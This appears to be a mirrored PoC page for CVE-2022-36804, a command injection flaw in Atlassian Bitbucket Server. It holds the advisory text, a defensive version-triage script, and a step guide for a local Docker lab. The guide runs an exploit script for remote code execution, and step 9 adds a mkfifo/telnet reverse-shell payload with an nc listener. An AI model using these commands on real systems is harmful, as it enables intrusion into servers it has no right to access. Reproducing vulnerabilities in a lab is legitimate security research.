Related Vulnerability
Title:
Atlassian Bitbucket Server security vulnerability
(CVE-2022-36804)
Description: Atlassian Bitbucket Server is a Git code-hosting solution from the Australian company Atlassian. It manages and reviews code and offers features such as diff views, JIRA integration and build integration. Atlassian Bitbucket Server and Data Center contain a security vulnerability that allows a remote attacker with read permission to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. The following products and versions are affected: 7.0.0 up to (but not including) 7.6.17, 7.7.0 up to (but not including) 7.17.10, 7.18.0
Introduction
<h1 style="font-size:10vw" align="left">CVE-2022-36804 - Atlassian Bitbucket Server and Data Center Command Injection Vulnerability</h1>
<img src="https://img.shields.io/badge/CVSS:3.1%20Score%20-8.8 HIGH-red"> <img src="https://img.shields.io/badge/Maintained%3F-Yes-96c40f">
******
⚠️ *For educational and authorized security research purposes only*
## Original Exploit Authors
Very grateful to the original PoC author [Walnut Security Services Pvt. Ltd](https://github.com/walnutsecurity)
## Description
Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allow remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. The vulnerability was reported to Atlassian's Bug Bounty Program by TheGrandPew.
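The affected-version list above is the quickest triage signal a defender has, so here is an added helper (example code written for this page, not part of the asepsaepdin or Walnut Security PoC repository) that encodes the seven advisory ranges as `[first affected, first fixed)` intervals and classifies a Bitbucket version string. It assumes the instance exposes the unauthenticated `GET /rest/api/1.0/application-properties` endpoint, whose JSON response carries a `version` field; the sample response embedded below is constructed, not captured from a real server, and the optional live fetch is the only part that touches the network.

```python
"""Affected-version triage for CVE-2022-36804 (added example, not the PoC's own code)."""
import json
import re
from urllib.request import urlopen  # used only by the optional live check

# Ranges from the Atlassian advisory quoted above, as (first affected, first fixed).
# A version is affected when lower <= version < fixed for any listed release line.
AFFECTED_RANGES = [
    ((7, 0, 0), (7, 6, 17)),
    ((7, 7, 0), (7, 17, 10)),
    ((7, 18, 0), (7, 21, 4)),
    ((8, 0, 0), (8, 0, 3)),
    ((8, 1, 0), (8, 1, 3)),
    ((8, 2, 0), (8, 2, 2)),
    ((8, 3, 0), (8, 3, 1)),
]


def parse_version(text):
    """Turn '7.21.3', '8.0' or '7.6.17-SNAPSHOT' into a comparable (major, minor, patch) tuple.

    A missing patch component counts as 0, so '7.6' is treated as 7.6.0; anything after the
    numeric prefix (build suffixes) is ignored. Comparing tuples keeps 7.17.9 < 7.17.10 correct,
    which naive string comparison would get wrong.
    """
    match = re.match(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not match:
        raise ValueError(f"unrecognised Bitbucket version string: {text!r}")
    major, minor, patch = match.groups()
    return (int(major), int(minor), int(patch or 0))


def fixed_version_for(version):
    """Return the first fixed release on the same line as `version`, or None if it is outside
    every advisory range (older than 7.0.0, already patched, or a later line)."""
    parsed = parse_version(version)
    for lower, fixed in AFFECTED_RANGES:
        if lower <= parsed < fixed:
            return ".".join(str(part) for part in fixed)
    return None


def is_affected(version):
    return fixed_version_for(version) is not None


def triage_application_properties(body):
    """Classify a Bitbucket instance from the JSON body of /rest/api/1.0/application-properties."""
    props = json.loads(body)
    version = props["version"]
    return {
        "version": version,
        "affected": is_affected(version),
        "fixed_in": fixed_version_for(version),
    }


def fetch_and_triage(base_url, timeout=5):
    """Live variant: query the instance's application-properties endpoint and triage the result.
    Assumes the endpoint is reachable unauthenticated; not exercised by the offline test."""
    url = base_url.rstrip("/") + "/rest/api/1.0/application-properties"
    with urlopen(url, timeout=timeout) as resp:
        return triage_application_properties(resp.read().decode("utf-8"))


# Constructed sample response (not captured from a real server) for offline use.
SAMPLE_RESPONSE = (
    '{"version":"7.21.3","buildNumber":"7021003",'
    '"buildDate":"1657000000000","displayName":"Bitbucket"}'
)

if __name__ == "__main__":
    print(triage_application_properties(SAMPLE_RESPONSE))
```

Note the caveat the classifier inherits from the advisory: a version that falls outside every listed range (for example a hypothetical 7.22.x) is reported as unaffected simply because the advisory does not list it, so treat `fixed_in: None` on an unfamiliar version as "check the vendor advisory", not as a clean bill of health.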
******
## Step Guide
1. First, clone the repository
```bash
git clone https://github.com/asepsaepdin/CVE-2022-36804.git
```
2. Change directory
```bash
cd CVE-2022-36804
```
3. Build the vulnerable container (Docker image names must be lowercase, so the tag is `cve-2022-36804`)
```bash
docker build -t cve-2022-36804 .
```
4. Run an ephemeral container (it stays in the foreground, so run the remaining steps from a second terminal)
```bash
docker run --rm -it --name cve-2022-36804 cve-2022-36804
```
5. Check the container's IP address (the steps below use `172.17.0.3`; substitute the address this command prints)
```bash
docker inspect cve-2022-36804 | grep "IPAddress"
```
6. Set up Atlassian Bitbucket and create a new public repository by opening `http://172.17.0.3:7990` in a browser
7. Check for Remote Code Execution (RCE)
```bash
python3 cve-2022-36804.py -u http://172.17.0.3:7990
```
8. Check for RCE with a custom command (`-c`)
```bash
python3 cve-2022-36804.py -u http://172.17.0.3:7990 -c id
```
9. From an attacker's perspective, remote code execution is most useful once it yields an interactive shell. The following command builds a reverse shell on the target from `mkfifo`, `telnet` and `sh` (so it needs a `telnet` client inside the container) and connects back to the attacker's host on port 4444/tcp; `172.17.0.1` is the default Docker bridge gateway, i.e. the host running the container:
```bash
python3 cve-2022-36804.py -u http://172.17.0.3:7990 -c 'TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.1 4444 0<$TF | sh 1>$TF'
```
Start the listener on the attacker's host before sending that payload:
```bash
nc -nlvp 4444
```
******
## Credits
- https://github.com/walnutsecurity/cve-2022-36804
- https://nvd.nist.gov/vuln/detail/cve-2022-36804
File snapshot
[4.0K] /data/pocs/9d39116974192f85883339d91d29b5fce0b64b7a
├── [6.5K] cve-2022-36804.py
├── [ 443] Dockerfile
└── [2.6K] README.md
0 directories, 3 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is gone or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request a local snapshot.
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.